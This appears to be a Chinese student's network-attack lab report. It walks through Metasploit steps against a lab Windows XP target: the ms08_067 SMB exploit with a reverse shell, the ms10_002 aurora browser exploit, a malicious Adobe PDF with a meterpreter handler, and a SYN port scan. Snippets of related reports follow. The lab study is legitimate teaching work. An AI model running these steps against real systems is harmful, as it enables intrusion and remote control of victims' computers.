2. 程式人生 > >20155217《網絡對抗》Exp05 MSF基礎應用

20155217《網絡對抗》Exp05 MSF基礎應用

阿新 發佈:2018-04-26
圖片 9.png 生成 alt 掌握 速度 方式 rev 得到

20155217《網絡對抗》Exp05 MSF基礎應用

實踐內容

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

  • 一個主動攻擊實踐,如ms08_067;
  • 一個針對瀏覽器的攻擊,如ms11_050;
  • 一個針對客戶端的攻擊,如Adobe;
  • 成功應用任何一個輔助模塊。

主動攻擊:ms08_067

  • 先用search ms08_067查詢針對該漏洞的攻擊模塊:

技術分享圖片

  • use exploit/windows/smb/ms08_067_netapi使用該模塊
  • 輸入命令show payloads會顯示出有效的攻擊載荷:

技術分享圖片

  • 使用命令set payload generic/shell_reverse_tcp
    設置攻擊有效載荷
  • 輸入命令set LHOST 192.168.152.130, set RHOST 192.168.152.131
  • 使用命令show options查看payload狀態:

技術分享圖片

  • 輸入命令exploit開始攻擊,攻擊成功(若攻擊失敗,則需要關閉XP的防火墻):

技術分享圖片

  • 在kali上執行ipconfig/all

技術分享圖片

  • 在win xp上執行ipconfig/all:

技術分享圖片

  • 發現二者結果相同,說明成功攻擊。

對瀏覽器攻擊:MS10-002漏洞攻擊

  • 先利用search ms10_002指令查看可以運用的攻擊模塊。

技術分享圖片

  • 使用use windows/browser/ms10_002_aurora模塊。
  • info
    查看該模塊的信息:

技術分享圖片

  • set payload windows/meterpreter/reverse_tcp設置payload,並設置需要設置的參數。
  • show options確認需要設置的參數是否已經設置好:

技術分享圖片

  • 確認參數設置無誤後,用exploit指令開始攻擊,攻擊成功後會有靶機需要訪問的網址:

技術分享圖片

  • 在靶機IE上輸入該網址,此時kali中可以看到有目標主機上線,會話建立。

技術分享圖片

技術分享圖片

  • 輸入sessions -i 1,成功獲取靶機的shell,可以對其進行操作:

技術分享圖片

針對客戶端的攻擊:adobe_toolbutton

  • 輸入use exploit/windows/fileformat/adobe_cooltype_sing
    進入模塊。
  • 使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷,並設置相關數據:

技術分享圖片

  • 輸入exploit,生成pdf文件,並可以看到pdf所在文件夾,將pdf復制到靶機裏:

技術分享圖片

技術分享圖片

  • 使用use exploit/multi/handler新建監聽模塊:

技術分享圖片

  • 輸入sysinfo,攻擊成功:

技術分享圖片

成功應用任何一個輔助模塊成功應用任何一個輔助模塊

  • show auxiliary查看所有輔助模塊,並從中選擇一個。我使用的是scanner/portscan/syn。它是通過發送TCP SYN標誌的方式來探測開放的端口。
  • show options查看配置,並進行相關配置:

技術分享圖片

  • 配置完成後,run,發現掃描開放端口成功:

技術分享圖片

基礎問題回答

  • 用自己的話解釋什麽是exploit,payload,encode。
  1. exploit是背著payload去攻擊,起到運載作用。
  2. payload則為攻擊負荷。
  3. encode為編碼器,使其得到偽裝,防止被查殺,打掩護用到的。

離實戰還缺些什麽技術或步驟?

實戰的話還需要結合靶機的環境去考慮。

實踐總結與體會

這次實驗再次能夠看出msf是一個比較全面的工具,但滲透的局限性也比較明顯。由於前幾天在準備考試,這次實驗完成得比較晚,但在其他同學的幫助下完成速度還是比較快的,畢竟比他們少走了很多彎路。而且這次又從其他角度成功地進行了攻擊,學習到了不少新的東西,美滋滋:D。

20155217《網絡對抗》Exp05 MSF基礎應用

相關推薦

20155305《對抗MSF基礎應用

pre iso鏡像 指令 選項 命令 進行 search 信息 中文簡體 20155305《網絡對抗》MSF基礎應用 實驗過程 實驗系統 靶機1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶機2:Windows XP

20155304《對抗MSF基礎應用

目標 str 服務 row 就會 HA 問題 pre 基礎 20155304《網絡對抗》MSF基礎應用 實踐內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 1.1一個主動攻擊實踐,如ms08_067; 1.2 一個針對

20155217對抗Exp05 MSF基礎應用

圖片 9.png 生成 alt 掌握 速度 方式 rev 得到 20155217《網絡對抗》Exp05 MSF基礎應用 實踐內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一個主動攻擊實踐,如ms08_067; 一個

20155311《對抗》Web基礎

進行 感覺 mys 火狐瀏覽器 賬號 修改 arc base 點擊 20155311《網絡對抗》Web基礎 實驗過程 Web前端:HTML 使用netstat -aptn查看80端口是否被占用(上次實驗設置為Apache使用80端口),如果被占用了就kill 原進程號(由

# 20155337《對抗》Web基礎

sql基礎 sql註入 page pda into html script 問題 tar 20155337《網絡對抗》Web基礎 實驗過程 Web前端:HTML 使用netstat -aptn查看80端口是否被占用(上次實驗設置為Apache使用80端口),如果被占用了就

2018-2019 20165208 對抗 Exp8 Web基礎

alt 緩沖 輸入 用戶認證 exp 式表 信息 多行文本 update 目錄 2018-2019 20165208 網絡對抗 Exp8 Web基礎 實驗內容 基礎問題回答

20155232《對抗》Exp5 MSF基礎應用

機構 XP ID 格式 兔子 網段 打印機共享 tcp option 20155232《網絡對抗》Exp5 MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode. exploit:就是利用可能存在的漏洞對目標進行攻擊,相當於一個載具

對抗》Exp5 MSF基礎應用

offic 漏洞 以及 無奈 2.3 auxiliary 去除 win 命令 20155336《網絡對抗》Exp5 MSF基礎應用 一、基礎知識回答 用自己的話解釋什麽是exploit,payload,encode exploit:漏洞利用,與靶機進行交互,攻擊靶機的最

2017-2018-2 20155315《對抗技術》Exp5 :MSF基礎應用

spl table inter lob master type AR .cn 捕獲 實驗目的 學會用metasploit進行簡單的攻擊操作 教程 實驗內容 metasploit中有六個模塊分別是 滲透攻擊模塊(Exploit Modules) 輔助模塊(Auxiliary

20155229《對抗技術》Exp5:MSF基礎應用

targe ret 研究 完成 系統類型 show ref coo AR 實驗內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一個主動攻擊實踐,如ms08-067; 一個針對瀏覽器的攻擊,如ms11-050; 一個針

20155330 《對抗》 Exp5 MSF基礎應用

ref 及其 smb tel 相關 windows服務 實踐 IE coo 20155330 《網絡對抗》 Exp5 MSF基礎應用 實踐過程記錄 Windows服務滲透:MS08_067漏洞攻擊 攻擊機:kali IP地址:192.168.124.132 靶機:wi

20154309 【對抗技術】Exp5:MSF基礎應用

系統訪問 inux 安裝程序 執行 反彈連接 敏感信息 back 很難 其他 20154309 【網絡對抗技術】Exp5:MSF基礎應用 一、原理與實踐說明 1.實踐內容 本實踐目標是掌握metasploit的基本應用方式,掌握重點常用的三種攻擊方式的思路。具體需要完成:

20155333 《對抗》 Exp5 MSF基礎應用

xpl 10.10 inf disco file 總結 format 成功 反向 20155333 《網絡對抗》 Exp5 MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode exploit:攻擊手段,是能使攻擊武器(paylo

2017-2018-2 20155310『對抗技術』Exp5:MSF基礎應用

set ons http load options 進行 中文 實驗 滲透測試 2017-2018-2 20155310『網絡對抗技術』Exp5:MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode exploit:由攻擊者或滲透測

2017-2018-2 《對抗技術》 20155322 Exp 5 MSF基礎應用

load tab 其他 obj lis 測試 可能 cte 信息 [-= 博客目錄 =-] 1-實踐目標 1.1-實踐介紹 1.2-實踐內容 1.3-實踐要求 2-實踐過程 2.1-情報收集 2.2-主動攻擊實踐-ms08_067 2.3-瀏覽器攻擊實踐-many

2017-2018-2 20155231《對抗技術》實驗五: MSF基礎應用

進行 rar oca aso 哪些 但是 前綴 關閉 搜索 2017-2018-2 20155231《網絡對抗技術》實驗五: MSF基礎應用 實踐目標 掌握信息搜集的最基礎技能與常用工具的使用方法。 實驗內容 (1)各種搜索技巧的應用 比如IP2Location 地理位置

2018-2019-2 20165313 《對抗技術》 Exp5:MSF基礎應用

耐心 內容 類型 sca 可能 依次 同時 flash 文件 實踐要求與問題回答 1. 實踐內容(3.5分) 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 1.1一個主動攻擊實踐,如ms08_067; (1分) 1.2 一

2018-2019-2 對抗技術 20165230 Exp5 MSF基礎應用

最大 網絡攻擊 如果 oca load search 返回 meta 字符串 目錄 1.實驗內容 2.基礎問題回答 3.實驗內容 任務一:一個主動攻擊實踐

2018-2019-2 對抗技術 20165225 Exp5 MSF基礎應用

code 敏感信息 解決 xpl num nco 體會 windows 安全 2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用 驗前準備 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一

2018-2019-2 20165209 《對抗技術》Exp5:MSF基礎應用

使用 掃描 總結 rev hand div 所有權 基礎 幹什麽 2018-2019-2 20165209 《網絡對抗技術》Exp5:MSF基礎應用 目錄 一、基礎問題回答和實驗內容 二、攻擊實例 主動攻擊的實踐 ms08_067 payload/generic/s